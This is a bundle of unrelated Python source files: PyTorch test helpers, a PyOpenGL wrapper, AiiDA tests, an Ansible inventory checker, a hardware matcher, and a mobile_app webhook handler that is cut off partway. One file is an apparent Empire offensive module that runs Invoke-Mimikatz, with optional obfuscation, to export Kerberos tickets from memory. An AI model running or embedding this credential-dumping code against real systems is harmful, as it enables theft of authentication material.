check_value(v, dtype, layout, device, fv, rg)
check_value(v.new_full(shape, fv + 1), dtype, layout, device, fv + 1, False)
out = v.new()
check_value(torch.full(shape, fv + 2, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, fv + 2, rg)
check_value(v.new_full(shape, fv + 3, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 3, False)
check_value(torch.full_like(v, fv + 4), dtype, layout, device, fv + 4, False)
check_value(torch.full_like(v, fv + 5,
dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 5, False)
THESE_TAKE_WAY_TOO_LONG = {
'test_Conv3d_groups',
'test_conv_double_backward',
'test_conv_double_backward_groups',
'test_Conv3d_dilated',
'test_Conv3d_stride_padding',
'test_Conv3d_dilated_strided',
'test_Conv3d',
'test_Conv2d_dilated',
'test_ConvTranspose3d_dilated',
'test_ConvTranspose2d_dilated',
'test_snli',
'test_Conv2d',
'test_Conv2d_padding',
'test_ConvTranspose2d_no_bias',
'test_ConvTranspose2d',
'test_ConvTranspose3d',
'test_Conv2d_no_bias',
'test_matmul_4d_4d',
'test_multinomial_invalid_probs',
}
running_script_path = None
def set_running_script_path():
global running_script_path
try:
running_file = os.path.abspath(os.path.realpath(sys.argv[0]))
if running_file.endswith('.py'): # skip if the running file is not a script
running_script_path = running_file
except Exception:
pass
def check_test_defined_in_running_script(test_case):
if running_script_path is None:
return
test_case_class_file = os.path.abspath(os.path.realpath(inspect.getfile(test_case.__class__)))
assert test_case_class_file == running_script_path, "Class of loaded TestCase \"{}\" " \
"is not defined in the running script \"{}\", but in \"{}\". Did you " \
"accidentally import a unittest.TestCase from another file?".format(
test_case.id(), running_script_path, test_case_class_file)
def load_tests(loader, tests, pattern):
set_running_script_path()
test_suite = unittest.TestSuite()
for test_group in tests:
for test in test_group:
check_test_defined_in_running_script(test)
test_suite.addTest(test)
return test_suite
class BytesIOContext(io.BytesIO):
def __enter__(self):
return self
def __exit__(self, *args):
pass
def _assertGradAndGradgradChecks(test_case, apply_fn, inputs):
# call assert function rather than returning a bool since it's nicer
# if we get whether this failed on the gradcheck or the gradgradcheck.
test_case.assertTrue(gradcheck(apply_fn, inputs))
test_case.assertTrue(gradgradcheck(apply_fn, inputs))
# Using @precisionOverride specific to your test is the recommended way
# of doing this. These are just some values that worked for test_nn.
dtype2prec_DONTUSE = {torch.float: 1e-5,
torch.double: 1e-5,
torch.half: 1e-2,
torch.bfloat16: 1e-1}
|
'''OpenGL extension EXT.robustness
This module customises the behaviour of the
OpenGL.raw.GLES2.EXT.robustness to provide a more
Python-friendly API
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/EXT/robustness.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.EXT.robustness import *
from OpenGL.raw.GLES2.EXT.robustness import _EXTENSION_NAME
def glInitRobustnessEXT():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
# INPUT glReadnPixelsEXT.data size not checked against bufSize
glReadnPixelsEXT=wrapper.wrapper(glReadnPixelsEXT).setInputArraySize(
'data', None
)
# INPUT glGetnUniformfvEXT.params size not checked against bufSize
glGetnUniformfvEXT=wrapper.wrapper(glGetnUniformfvEXT).setInputArraySize(
'params', None
)
# INPUT glGetnUniformivEXT.params size not checked against bufSize
glGetnUniformivEXT=wrapper.wrapper(glGetnUniformivEXT).setInputArraySize(
'params', None
)
### END AUTOGENERATED SECTION
|
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
# pylint: disable=invalid-name
"""Tests for :class:`aiida.orm.nodes.data.base.BaseType` classes."""
import operator
import pytest
from aiida.orm import Bool, Float, Int, NumericType, Str, load_node
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize(
'node_type, default, value', [
(Bool, False, True),
(Int, 0, 5),
(Float, 0.0, 5.5),
(Str, '', 'a'),
]
)
def test_create(node_type, default, value):
"""Test the creation of the ``BaseType`` nodes."""
node = node_type()
assert node.value == default
node = node_type(value)
assert node.value == value
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type', [Bool, Float, Int, Str])
def test_store_load(node_type):
"""Test ``BaseType`` node storing and loading."""
node = node_type()
node.store()
loaded = load_node(node.pk)
assert node.value == loaded.value
@pytest.mark.usefixtures('clear_database_before_test')
def test_modulo():
"""Test ``Int`` modulus operation."""
term_a = Int(12)
term_b = Int(10)
assert term_a % term_b == 2
assert isinstance(term_a % term_b, NumericType)
assert term_a % 10 == 2
assert isinstance(term_a % 10, NumericType)
assert 12 % term_b == 2
assert isinstance(12 % term_b, NumericType)
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type, a, b', [
(Int, 3, 5),
(Float, 1.2, 5.5),
])
def test_add(node_type, a, b):
"""Test addition for ``Int`` and ``Float`` nodes."""
node_a = node_type(a)
node_b = node_type(b)
result = node_a + node_b
assert isinstance(result, node_type)
assert result.value == a + b
# Node and native (both ways)
result = node_a + b
assert isinstance(result, node_type)
assert result.value == a + b
result = a + node_b
assert isinstance(result, node_type)
assert result.value == a + b
# Inplace
result = node_type(a)
result += node_b
assert isinstance(result, node_type)
assert result.value == a + b
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type, a, b', [
(Int, 3, 5),
(Float, 1.2, 5.5),
])
def test_multiplication(node_type, a, b):
"""Test floats multiplication."""
node_a = node_type(a)
node_b = node_type(b)
# Check multiplication
result = node_a * node_b
assert isinstance(result, node_type)
assert result.value == a * b
# Check multiplication Node and native (both ways)
result = node_a * b
assert isinstance(result, node_type)
assert result.value == a * b
result = a * node_b
assert isinstance(result, node_type)
assert result.value == a * b
# Inplace
result = node_type(a)
result *= node_b
assert isinstance(result, node_type)
assert result.value == a * b
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type, a, b', [
(Int, 3, 5),
(Float, 1.2, 5.5),
])
@pytest.mark.usefixtures('clear_database_before_test')
def test_division(node_type, a, b):
"""Test the ``BaseType`` normal division operator."""
node_a = node_type(a)
node_b = node_type(b)
result = node_a / node_b
assert result == a / b
assert isinstance(result, Float) # Should be a `Float` for both node types
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type, a, b', [
(Int, 3, 5),
(Float, 1.2, 5.5),
])
@pytest.mark.usefixtures('clear_database_before_test')
def test_division_integer(node_type, a, b):
"""Test the ``Int`` integer division operator."""
node_a = node_type(a)
node_b = node_type(b)
result = node_a // node_b
assert result == a // b
assert isinstance(result, node_type)
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type, base, power', [
(Int, 5, 2),
(Float, 3.5, 3),
])
def test_power(node_type, base, power):
"""Test power operator."""
node_base = node_type(base)
node_power = node_type(power)
result = node_base**node_power
assert result == base**power
assert isinstance(result, node_type)
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type, a, b', [
(Int, 5, 2),
(Float, 3.5, 3),
])
def test_modulus(node_type, a, b):
"""Test modulus operator."""
node_a = node_type(a)
node_b = node_type(b)
assert node_a % node_b == a % b
assert isinstance(node_a % node_b, node_type)
assert node_a % b == a % b
assert isinstance(node_a % b, node_type)
assert a % node_b == a % b
assert isinstance(a % node_b, node_type)
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize(
'opera', [
operator.add, operator.mul, operator.pow, operator.lt, operator.le, operator.gt, operator.ge, operator.iadd,
operator.imul
]
)
def test_operator(opera):
"""Test operations between Int and Float objects."""
node_a = Float(2.2)
node_b = Int(3)
for node_x, node_y in [(node_a, node_b), (node_b, node_a)]:
res = opera(node_x, node_y)
c_val = opera(node_x.value, node_y.value)
assert res._type == type(c_val) # pylint: disable=protected-access
assert res == opera(node_x.value, node_y.value)
@pytest.mark.usefixtures('clear_database_before_test')
@pytest.mark.parametrize('node_type, a, b', [
(Bool, False, True),
(Int, 2, 5),
(Float, 2.5, 5.5),
(Str, 'a', 'b'),
])
def test_equality(node_type, a, b):
"""Test equality comparison for the base types."""
node_a = node_type(a)
node_a_clone = node_type(a)
node_b = node_type(b)
# Test equality comparison with Python base types
assert node_a == a
assert node_a != b
# Test equality comparison with other `BaseType` nodes
assert node_a == node_a_clone
assert node_a != node_b
|
#!/usr/bin/env python
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
import sys
def check_hosts(contrib, plugin):
contrib_hosts = sorted(contrib['_meta']['hostvars'].keys())
plugin_hosts = sorted(plugin['_meta']['hostvars'].keys())
assert contrib_hosts == plugin_hosts
return contrib_hosts, plugin_hosts
def check_groups(contrib, plugin):
contrib_groups = set(contrib.keys())
plugin_groups = set(plugin.keys())
missing_groups = contrib_groups.difference(plugin_groups)
if missing_groups:
print("groups: %s are missing from the plugin" % missing_groups)
assert not missing_groups
return contrib_groups, plugin_groups
def check_host_vars(key, value, plugin, host):
# tags are a dict in the plugin
if key.startswith('ec2_tag'):
print('assert tag', key, value)
assert 'tags' in plugin['_meta']['hostvars'][host], 'b file does not have tags in host'
btags = plugin['_meta']['hostvars'][host]['tags']
tagkey = key.replace('ec2_tag_', '')
assert tagkey in btags, '%s tag not in b file host tags' % tagkey
assert value == btags[tagkey], '%s != %s' % (value, btags[tagkey])
else:
print('assert var', key, value, key in plugin['_meta']['hostvars'][host], plugin['_meta']['hostvars'][host].get(key))
assert key in plugin['_meta']['hostvars'][host], "%s not in b's %s hostvars" % (key, host)
assert value == plugin['_meta']['hostvars'][host][key], "%s != %s" % (value, plugin['_meta']['hostvars'][host][key])
def main():
# a should be the source of truth (the script output)
a = sys.argv[1]
# b should be the thing to check (the plugin output)
b = sys.argv[2]
with open(a, 'r') as f:
adata = json.loads(f.read())
with open(b, 'r') as f:
bdata = json.loads(f.read())
print(adata)
print(bdata)
# all hosts should be present obviously
ahosts, bhosts = check_hosts(adata, bdata)
# all groups should be present obviously
agroups, bgroups = check_groups(adata, bdata)
# check host vars can be reconstructed
for ahost in ahosts:
contrib_host_vars = adata['_meta']['hostvars'][ahost]
for key, value in contrib_host_vars.items():
check_host_vars(key, value, bdata, ahost)
if __name__ == "__main__":
main()
|
from __future__ import print_function
from builtins import str
from builtins import object
from lib.common import helpers
import threading
class Module(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Mimikatz extract kerberos tickets.',
'Author': ['@JosephBialek', '@gentilkiwi'],
'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
"to extract kerberos tickets from memory in base64-encoded form."),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'http://clymb3r.wordpress.com/',
'http://blog.gentilkiwi.com'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# used to protect self.http and self.mainMenu.conn during threaded listener access
self.lock = threading.Lock()
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
# this might not be necessary. Could probably be achieved by just callingg mainmenu.get_db but all the other files have
# implemented it in place. Might be worthwhile to just make a database handling file -Hubbl3
def get_db_connection(self):
"""
Returns the cursor for SQLlite DB
"""
self.lock.acquire()
self.mainMenu.conn.row_factory = None
self.lock.release()
return self.mainMenu.conn
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "Invoke-Mimikatz -Command '\"standard::base64\" \"kerberos::list /export\"'"
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
# Get the random function name generated at install and patch the stager with the proper function name
conn = self.get_db_connection()
self.lock.acquire()
cur = conn.cursor()
cur.execute("SELECT Invoke_Mimikatz FROM functions")
replacement = cur.fetchone()
cur.close()
self.lock.release()
script = script.replace("Invoke-Mimikatz", replacement[0])
return script
|
CODEOWNERS = ["@esphome/core"]
|
from micromouse import mouse, maze
def begin():
"""
:return: None. This function begins micromouse operation.
"""
some_maze = maze.Maze(16)
some_mouse = mouse.Mouse(0, 0, some_maze)
print "Mouse initialized at (%d, %d)" % (some_mouse.x, some_mouse.y)
while some_mouse.maze.map[some_mouse.x][some_mouse.y].get_weight() is not 0:
path = some_mouse.find_path()
some_mouse.take_path(path)
print "Mouse moved to (%d, %d)" % (some_mouse.x, some_mouse.y)
print "Mouse solved the maze."
if __name__ == '__main__':
begin()
|
"""
Copyright (c) 2017 Cyberhaven
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import logging
import os
import sys
from sh import git, ErrorReturnCode
from s2e_env import CONSTANTS
from s2e_env.command import CommandError
logger = logging.getLogger(__name__)
def git_clone(git_repo_url, git_repo_dir):
try:
logger.info('Fetching from %s to %s', git_repo_url, git_repo_dir)
git.clone(git_repo_url, git_repo_dir, _out=sys.stdout,
_err=sys.stderr, _fg=True)
except ErrorReturnCode as e:
raise CommandError(e)
def git_clone_to_source(env_path, git_repo):
git_url = CONSTANTS['repos']['url']
git_repo_dir = os.path.join(env_path, 'source', git_repo)
git_repo_url = '%s/%s' % (git_url, git_repo)
git_clone(git_repo_url, git_repo_dir)
logger.success('Fetched %s', git_repo)
|
#
# Copyright (C) 2013-2015 eNovance SAS <licensing@enovance.com>
#
# Author: Frederic Lepied <frederic.lepied@enovance.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
'''Functions to match according to a requirement specification.'''
import ipaddress
import logging
import re
import sys
LOG = logging.getLogger('hardware.matcher')
def _adder(array, index, value):
'Auxiliary function to add a value to an array.'
array[index] = value
def _appender(array, index, value):
'Auxiliary function to append a value to an array.'
try:
array[index].append(value)
except KeyError:
array[index] = [value, ]
def _range(elt, minval, maxval):
'Helper for match_spec.'
return float(elt) >= float(minval) and float(elt) <= float(maxval)
def _gt(left, right):
'Helper for match_spec.'
return float(left) > float(right)
def _ge(left, right):
'Helper for match_spec.'
return float(left) >= float(right)
def _lt(left, right):
'Helper for match_spec.'
return float(left) < float(right)
def _le(left, right):
'Helper for match_spec.'
return float(left) <= float(right)
def _not(_, right):
'Helper for match_spec.'
return not right
def _and(_, left, right):
'Helper for match_spec.'
return left and right
def _or(_, left, right):
'Helper for match_spec.'
return left or right
def _network(left, right):
'Helper for match_spec.'
return ipaddress.IPv4Address(left) in ipaddress.IPv4Network(right)
def _regexp(left, right):
'Helper for match_spec.'
return re.search(right, left) is not None
def _in(elt, *lst):
'Helper for match_spec.'
return elt in lst
_FUNC_REGEXP = re.compile(r'^([^(]+)' # function name
r'\(\s*([^,]+)' # first argument
r'(?:\s*,\s*(.+))?' # remaining optional arguments
r'\)$') # last parenthesis
def _call_func(func, implicit, res):
'Helper function for extract_result and match_spec'
args = [implicit, res.group(2)]
# split the optional arguments if we have some
if res.group(3):
args = args + re.split(r'\s*,\s*', res.group(3))
# remove strings delimiters
args = [x.strip('\'"') for x in args]
# call function
args = [_extract_result(implicit, x) for x in args]
return func(*args)
def _extract_result(implicit, expr):
'Helper function for match_spec'
res = _FUNC_REGEXP.search(expr)
if res:
func_name = '_' + res.group(1)
if func_name in globals():
return _call_func(globals()[func_name], implicit, res)
else:
return expr
else:
return expr
def match_spec(spec, lines, arr, adder=_adder):
'Match a line according to a spec and store variables in <var>.'
# match a line without variable
for idx in range(len(lines)):
if lines[idx] == spec:
res = lines[idx]
del lines[idx]
return res
# match a line with a variable, a function or both
for lidx in range(len(lines)):
line = lines[lidx]
varidx = []
for idx in range(4):
# try to split the variable and function parts if we have both
if spec[idx][0] == '$':
parts = spec[idx].split('=')
if len(parts) == 2:
var, func = parts
matched = False
else:
var = func = spec[idx]
else:
var = func = spec[idx]
# Match a function
if func[-1] == ')':
res = _FUNC_REGEXP.search(func)
if res:
func_name = '_' + res.group(1)
if func_name in globals():
if not _call_func(globals()[func_name],
line[idx], res):
if var == func:
break
else:
if var == func:
continue
matched = True
else:
if var == func:
break
# Match a variable
if ((var == func) or (var != func and matched)) and var[0] == '$':
if adder == _adder and var[1:] in arr:
if arr[var[1:]] != line[idx]:
break
varidx.append((idx, var[1:]))
# Match the full string
elif line[idx] != spec[idx]:
break
else:
for i, var in varidx:
adder(arr, var, line[i])
res = lines[lidx]
del lines[lidx]
return res
return False
def match_all(lines, specs, arr, arr2, debug=False, level=0):
'''Match all lines according to a spec.
Store variables starting with a $ in <arr>. Variables starting with
2 $ like $$vda are stored in arr and arr2.
'''
# Work on a copy of lines to avoid changing the real lines because
# match_spec removes the matched line to not match it again on next
# calls.
lines = list(lines)
specs = list(specs)
copy_arr = dict(arr)
points = []
# Prevent infinit loops
if level == 50:
return False
# Match lines using specs
while len(specs) > 0:
copy_specs = list(specs)
spec = specs.pop(0)
line = match_spec(spec, lines, arr)
if debug:
sys.stderr.write('match_spec: %s %s\n' % (line, spec))
# No match
if not line:
# Backtrack on the backtracking points
while len(points) > 0:
lines, specs, new_arr = points.pop()
if debug:
sys.stderr.write('retrying with: %s\n' %
(new_arr,))
if match_all(lines, specs, new_arr, arr2, debug, level + 1):
# Copy arr back
for k in new_arr:
arr[k] = new_arr[k]
if debug:
sys.stderr.write('success: %d\n' % level)
return True
if level == 0 and debug:
sys.stderr.write('spec: %s not matched\n' % str(spec))
return False
else:
# Store backtraking points when we find a new variable
if arr != copy_arr:
copy_lines = list(lines)
# Put the matching line at the end of the lines
copy_lines.append(line)
points.append((copy_lines, copy_specs, copy_arr))
copy_arr = dict(arr)
if debug:
sys.stderr.write('new var: %s %s\n' % (arr, line))
# Manage $$ variables
for key in arr:
if key[0] == '$':
nkey = key[1:]
arr[nkey] = arr[key]
arr2[nkey] = arr[key]
del arr[key]
return True
def match_multiple(lines, spec, arr):
'Use spec to find all the matching lines and gather variables.'
ret = False
lines = list(lines)
while match_spec(spec, lines, arr, adder=_appender):
ret = True
return ret
def generate_filename_and_macs(items):
'''Generate a file name for a hardware using DMI information.
(product name and version) then if the DMI serial number is
available we use it unless we lookup the first mac address.
As a result, we do have a filename like :
<dmi_product_name>-<dmi_product_version>-{dmi_serial_num|mac_address}
'''
# Duplicate items as it will be modified by match_* functions
hw_items = list(items)
sysvars = {}
sysvars['sysname'] = ''
if match_spec(('system', 'product', 'vendor', '$sysprodvendor'),
hw_items, sysvars):
sysvars['sysname'] += (re.sub(r'\W+', '', sysvars['sysprodvendor']) +
'-')
if match_spec(('system', 'product', 'name', '$sysprodname'),
hw_items, sysvars):
sysvars['sysname'] = re.sub(r'\W+', '', sysvars['sysprodname']) + '-'
# Let's use any existing DMI serial number or take the first mac address
if match_spec(('system', 'product', 'serial', '$sysserial'),
hw_items, sysvars):
sysvars['sysname'] += re.sub(r'\W+', '', sysvars['sysserial']) + '-'
# we always need to have the mac addresses for pxemngr
if match_multiple(hw_items,
('network', '$eth', 'serial', '$serial'),
sysvars):
sysvars['sysname'] += sysvars['serial'][0].replace(':', '-')
else:
LOG.warning('unable to detect network macs')
return sysvars
# matcher.py ends here
|
"""Webhook handlers for mobile_app."""
from functools import wraps
import logging
import secrets
from aiohttp.web import HTTPBadRequest, Request, Response, json_response
from nacl.secret import SecretBox
import voluptuous as vol
from openpeerpower.components.binary_sensor import (
DEVICE_CLASSES as BINARY_SENSOR_CLASSES,
)
from openpeerpower.components.device_tracker import (
ATTR_BATTERY,
ATTR_GPS,
ATTR_GPS_ACCURACY,
ATTR_LOCATION_NAME,
)
from openpeerpower.components.frontend import MANIFEST_JSON
from openpeerpower.components.sensor import DEVICE_CLASSES as SENSOR_CLASSES
from openpeerpower.components.zone.const import DOMAIN as ZONE_DOMAIN
from openpeerpower.const import (
ATTR_DOMAIN,
ATTR_SERVICE,
ATTR_SERVICE_DATA,
CONF_WEBHOOK_ID,
HTTP_BAD_REQUEST,
HTTP_CREATED,
)
from openpeerpower.core import EventOrigin
from openpeerpower.exceptions import OpenPeerPowerError, ServiceNotFound, TemplateError
from openpeerpower.helpers import config_validation as cv, device_registry as dr
from openpeerpower.helpers.dispatcher import async_dispatcher_send
from openpeerpower.helpers.template import attach
from openpeerpower.helpers.typing import OpenPeerPowerType
from openpeerpower.util.decorator import Registry
from .const import (
ATTR_ALTITUDE,
ATTR_APP_DATA,
ATTR_APP_VERSION,
ATTR_COURSE,
ATTR_DEVICE_ID,
ATTR_DEVICE_NAME,
ATTR_EVENT_DATA,
ATTR_EVENT_TYPE,
ATTR_MANUFACTURER,
ATTR_MODEL,
ATTR_OS_VERSION,
ATTR_SENSOR_ATTRIBUTES,
ATTR_SENSOR_DEVICE_CLASS,
ATTR_SENSOR_ICON,
ATTR_SENSOR_NAME,
ATTR_SENSOR_STATE,
ATTR_SENSOR_TYPE,
ATTR_SENSOR_TYPE_BINARY_SENSOR,
ATTR_SENSOR_TYPE_SENSOR,
ATTR_SENSOR_UNIQUE_ID,
ATTR_SENSOR_UOM,
ATTR_SPEED,
ATTR_SUPPORTS_ENCRYPTION,
ATTR_TEMPLATE,
ATTR_TEMPLATE_VARIABLES,
ATTR_VERTICAL_ACCURACY,
ATTR_WEBHOOK_DATA,
ATTR_WEBHOOK_ENCRYPTED,
ATTR_WEBHOOK_ENCRYPTED_DATA,
ATTR_WEBHOOK_TYPE,
CONF_CLOUDHOOK_URL,
CONF_REMOTE_UI_URL,
CONF_SECRET,
DATA_CONFIG_ENTRIES,
DATA_DELETED_IDS,
DATA_STORE,
DOMAIN,
ERR_ENCRYPTION_ALREADY_ENABLED,
ERR_ENCRYPTION_NOT_AVAILABLE,
ERR_ENCRYPTION_REQUIRED,
ERR_SENSOR_DUPLICATE_UNIQUE_ID,
ERR_SENSOR_NOT_REGISTERED,
SIGNAL_LOCATION_UPDATE,
SIGNAL_SENSOR_UPDATE,
)
from .helpers import (
_decrypt_payload,
empty_okay_response,
error_response,
registration_context,
safe_registration,
savable_state,
supports_encryption,
webhook_response,
)
_LOGGER = logging.getLogger(__name__)
WEBHOOK_COMMANDS = Registry()
COMBINED_CLASSES = set(BINARY_SENSOR_CLASSES + SENSOR_CLASSES)
SENSOR_TYPES = [ATTR_SENSOR_TYPE_BINARY_SENSOR, ATTR_SENSOR_TYPE_SENSOR]
WEBHOOK_PAYLOAD_SCHEMA = vol.Schema(
{
vol.Required(ATTR_WEBHOOK_TYPE): cv.string,
vol.Required(ATTR_WEBHOOK_DATA, default={}): vol.Any(dict, list),
vol.Optional(ATTR_WEBHOOK_ENCRYPTED, default=False): cv.boolean,
vol.Optional(ATTR_WEBHOOK_ENCRYPTED_DATA): cv.string,
}
)
def validate_schema(schema):
"""Decorate a webhook function with a schema."""
if isinstance(schema, dict):
schema = vol.Schema(schema)
def wrapper(func):
"""Wrap function so we validate schema."""
@wraps(func)
async def validate_and_run(opp, config_entry, data):
"""Validate input and call handler."""
try:
data = schema(data)
except vol.Invalid as ex:
err = vol.humanize.humanize_error(data, ex)
_LOGGER.error("Received invalid webhook payload: %s", err)
return empty_okay_response()
return await func(opp, config_entry, data)
return validate_and_run
return wrapper
async def handle_webhook(
opp: OpenPeerPowerType, webhook_id: str, request: Request
) -> Response:
"""Handle webhook callback."""
if webhook_id in opp.data[DOMAIN][DATA_DELETED_IDS]:
return Response(status=410)
config_entry = opp.data[DOMAIN][DATA_CONFIG_ENTRIES][webhook_id]
try:
req_data = await request.json()
except ValueError:
_LOGGER.warning("Received invalid JSON from mobile_app")
return empty_okay_response(status=HTTP_BAD_REQUEST)
if (
ATTR_WEBHOOK_ENCRYPTED not in req_data
and config_entry.data[ATTR_SUPPORTS_ENCRYPTION]
):
_LOGGER.warning(
"Refusing to accept unencrypted webhook from %s",
config_entry.data[ATTR_DEVICE_NAME],
)
return error_response(ERR_ENCRYPTION_REQUIRED, "Encryption required")
try:
req_data = WEBHOOK_PAYLOAD_SCHEMA(req_data)
except vol.Invalid as ex:
err = vol.humanize.humanize_error(req_data, ex)
_LOGGER.error("Received invalid webhook payload: %s", err)
return empty_okay_response()
webhook_type = req_data[ATTR_WEBHOOK_TYPE]
webhook_payload = req_data.get(ATTR_WEBHOOK_DATA, {})
if req_data[ATTR_WEBHOOK_ENCRYPTED]:
enc_data = req_data[ATTR_WEBHOOK_ENCRYPTED_DATA]
webhook_payload = _decrypt_payload(config_entry.data[CONF_SECRET], enc_data)
if webhook_type not in WEBHOOK_COMMANDS:
_LOGGER.error("Received invalid webhook type: %s", webhook_type)
return empty_okay_response()
_LOGGER.debug(
"Received webhook payload for type %s: %s", webhook_type, webhook_payload
)
return await WEBHOOK_COMMANDS[webhook_type](opp, config_entry, webhook_payload)
@WEBHOOK_COMMANDS.register("call_service")
@validate_schema(
{
vol.Required(ATTR_DOMAIN): cv.string,
vol.Required(ATTR_SERVICE): cv.string,
vol.Optional(ATTR_SERVICE_DATA, default={}): dict,
}
)
async def webhook_call_service(opp, config_entry, data):
"""Handle a call service webhook."""
try:
await opp.services.async_call(
data[ATTR_DOMAIN],
data[ATTR_SERVICE],
data[ATTR_SERVICE_DATA],
blocking=True,
context=registration_context(config_entry.data),
)
except (vol.Invalid, ServiceNotFound, Exception) as ex:
_LOGGER.error(
"Error when calling service during mobile_app "
"webhook (device name: %s): %s",
config_entry.data[ATTR_DEVICE_NAME],
ex,
)
raise HTTPBadRequest()
return empty_okay_response()
@WEBHOOK_COMMANDS.register("fire_event")
@validate_schema(
{
vol.Required(ATTR_EVENT_TYPE): cv.string,
vol.Optional(ATTR_EVENT_DATA, default={}): dict,
}
)
async def webhook_fire_event(opp, config_entry, data):
"""Handle a fire event webhook."""
event_type = data[ATTR_EVENT_TYPE]
opp.bus.async_fire(
event_type,
data[ATTR_EVENT_DATA],
EventOrigin.remote,
context=registration_context(config_entry.data),
)
return empty_okay_response()
@WEBHOOK_COMMANDS.register("render_template")
@validate_schema(
{
str: {
vol.Required(ATTR_TEMPLATE): cv.template,
vol.Optional(ATTR_TEMPLATE_VARIABLES, default={}): dict,
}
}
)
async def webhook_render_template(opp, config_entry, data):
"""Handle a render template webhook."""
resp = {}
for key, item in data.items():
try:
tpl = item[ATTR_TEMPLATE]
attach(opp, tpl)
resp[key] = tpl.async_render(item.get(ATTR_TEMPLATE_VARIABLES))
except TemplateError as ex:
resp[key] = {"error": str(ex)}
return webhook_response(resp, registration=config_entry.data)
@WEBHOOK_COMMANDS.register("update_location")
@validate_schema(
{
vol.Optional(ATTR_LOCATION_NAME): cv.string,
vol.Required(ATTR_GPS): cv.gps,
vol.Required(ATTR_GPS_ACCURACY): cv.positive_int,
vol.Optional(ATTR_BATTERY): cv.positive_int,
vol.Optional(ATTR_SPEED): cv.positive_int,
vol.Optional(ATTR_ALTITUDE): vol.Coerce(float),
vol.Optional(ATTR_COURSE): cv.positive_int,
vol.Optional(ATTR_VERTICAL_ACCURACY): cv.positive_int,
}
)
async def webhook_update_location(opp, config_entry, data):
"""Handle an update location webhook."""
opp.helpers.dispatcher.async_dispatcher_send(
SIGNAL_LOCATION_UPDATE.format(config_entry.entry_id), data
)
return empty_okay_response()
@WEBHOOK_COMMANDS.register("update_registration")
@validate_schema(
{
vol.Optional(ATTR_APP_DATA, default={}): dict,
vol.Required(ATTR_APP_VERSION): cv.string,
vol.Required(ATTR_DEVICE_NAME): cv.string,
vol.Required(ATTR_MANUFACTURER): cv.string,
vol.Required(ATTR_MODEL): cv.string,
vol.Optional(ATTR_OS_VERSION): cv.string,
}
)
async def webhook_update_registration(opp, config_entry, data):
"""Handle an update registration webhook."""
new_registration = {**config_entry.data, **data}
device_registry = await dr.async_get_registry(opp)
device_registry.async_get_or_create(
config_entry_id=config_entry.entry_id,
